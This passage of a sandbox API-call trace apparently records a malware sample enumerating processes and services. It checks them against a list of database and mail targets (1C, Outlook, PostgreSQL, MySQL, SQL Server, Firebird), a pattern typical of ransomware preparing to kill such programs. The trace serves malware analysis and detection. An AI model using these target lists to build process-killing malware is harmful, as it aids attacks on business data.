lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.970] lstrlenW (lpString="winlogon.exe") returned 12 [0249.970] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0249.970] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0249.970] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.971] lstrlenW (lpString="services.exe") returned 12 [0249.971] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0249.971] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0249.971] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.971] lstrlenW (lpString="lsass.exe") returned 9 [0249.971] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0249.971] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0249.971] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0249.971] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0249.971] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0249.971] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0249.971] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0249.971] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0249.972] lstrlenW (lpString="lsm.exe") returned 7 [0249.972] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0249.972] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0249.972] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0249.972] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0249.972] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0249.972] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0249.972] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0249.972] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.972] lstrlenW (lpString="svchost.exe") returned 11 [0249.972] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.972] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.973] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.973] lstrlenW (lpString="svchost.exe") returned 11 [0249.973] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.973] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.973] lstrlenW (lpString="svchost.exe") returned 11 [0249.973] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.973] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0249.974] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.974] lstrlenW (lpString="svchost.exe") returned 11 [0249.974] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0249.974] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0249.974] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.974] lstrlenW (lpString="svchost.exe") returned 11 [0249.974] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0249.975] lstrlenW (lpString="audiodg.exe") returned 11 [0249.975] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.975] lstrlenW (lpString="svchost.exe") returned 11 [0249.975] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.975] lstrlenW (lpString="svchost.exe") returned 11 [0249.975] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0249.976] lstrlenW (lpString="userinit.exe") returned 12 [0249.976] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.976] lstrlenW (lpString="dwm.exe") returned 7 [0249.976] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.976] lstrlenW (lpString="explorer.exe") returned 12 [0249.976] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.977] lstrlenW (lpString="spoolsv.exe") returned 11 [0249.977] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.977] lstrlenW (lpString="taskhost.exe") returned 12 [0249.977] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.977] lstrlenW (lpString="svchost.exe") returned 11 [0249.977] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0249.977] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0249.977] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0249.978] lstrlenW (lpString="reader_sl.exe") returned 13 [0249.978] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0249.978] lstrlenW (lpString="dllhost.exe") returned 11 [0249.978] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0249.978] CloseHandle (hObject=0x3b8) returned 1 [0249.978] Sleep (dwMilliseconds=0x1f4) [0250.749] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea128 [0250.750] EnumServicesStatusExW (in: hSCManager=0x47ea128, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0250.750] GetLastError () returned 0xea [0250.750] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dee5b0 [0250.750] EnumServicesStatusExW (in: hSCManager=0x47ea128, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0250.750] CloseServiceHandle (hSCObject=0x47ea128) returned 1 [0250.751] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0250.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0250.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0250.751] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0250.751] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0250.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0250.751] lstrlenW (lpString="AudioSrv") returned 8 [0250.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0250.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0250.751] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0250.751] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0250.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0250.751] lstrlenW (lpString="BFE") returned 3 [0250.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0250.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0250.751] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0250.751] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0250.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0250.751] lstrlenW (lpString="CryptSvc") returned 8 [0250.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0250.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0250.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0250.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0250.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0250.751] lstrlenW (lpString="CscService") returned 10 [0250.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0250.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0250.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0250.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0250.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0250.751] lstrlenW (lpString="DcomLaunch") returned 10 [0250.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0250.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0250.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0250.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0250.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0250.752] lstrlenW (lpString="Dhcp") returned 4 [0250.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0250.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0250.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0250.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0250.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0250.752] lstrlenW (lpString="Dnscache") returned 8 [0250.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0250.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0250.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0250.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0250.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0250.752] lstrlenW (lpString="DPS") returned 3 [0250.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0250.753] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0250.753] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0250.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0250.753] lstrlenW (lpString="eventlog") returned 8 [0250.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0250.753] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0250.753] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0250.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0250.753] lstrlenW (lpString="EventSystem") returned 11 [0250.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0250.753] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0250.753] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0250.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0250.753] lstrlenW (lpString="gpsvc") returned 5 [0250.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0250.753] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0250.753] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0250.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0250.753] lstrlenW (lpString="LanmanWorkstation") returned 17 [0250.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0250.753] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0250.753] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0250.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0250.753] lstrlenW (lpString="lmhosts") returned 7 [0250.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0250.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0250.754] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0250.754] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0250.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0250.754] lstrlenW (lpString="MMCSS") returned 5 [0250.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0250.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0250.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0250.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0250.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0250.754] lstrlenW (lpString="MpsSvc") returned 6 [0250.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0250.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0250.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0250.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0250.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0250.754] lstrlenW (lpString="NlaSvc") returned 6 [0250.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0250.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0250.754] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0250.754] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0250.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0250.754] lstrlenW (lpString="nsi") returned 3 [0250.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0250.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0250.754] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0250.754] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0250.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0250.754] lstrlenW (lpString="PcaSvc") returned 6 [0250.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0250.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0250.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0250.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0250.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0250.755] lstrlenW (lpString="PlugPlay") returned 8 [0250.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0250.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0250.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0250.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0250.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0250.755] lstrlenW (lpString="Power") returned 5 [0250.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0250.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0250.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0250.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0250.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0250.755] lstrlenW (lpString="ProfSvc") returned 7 [0250.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0250.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0250.755] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0250.755] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0250.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0250.755] lstrlenW (lpString="RpcEptMapper") returned 12 [0250.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0250.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0250.755] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0250.755] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0250.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0250.755] lstrlenW (lpString="RpcSs") returned 5 [0250.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0250.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0250.756] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0250.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0250.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0250.756] lstrlenW (lpString="SamSs") returned 5 [0250.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0250.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0250.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0250.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0250.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0250.756] lstrlenW (lpString="Schedule") returned 8 [0250.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0250.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0250.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0250.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0250.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0250.756] lstrlenW (lpString="SENS") returned 4 [0250.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0250.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0250.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0250.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0250.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0250.756] lstrlenW (lpString="ShellHWDetection") returned 16 [0250.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0250.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0250.756] lstrcmpiW 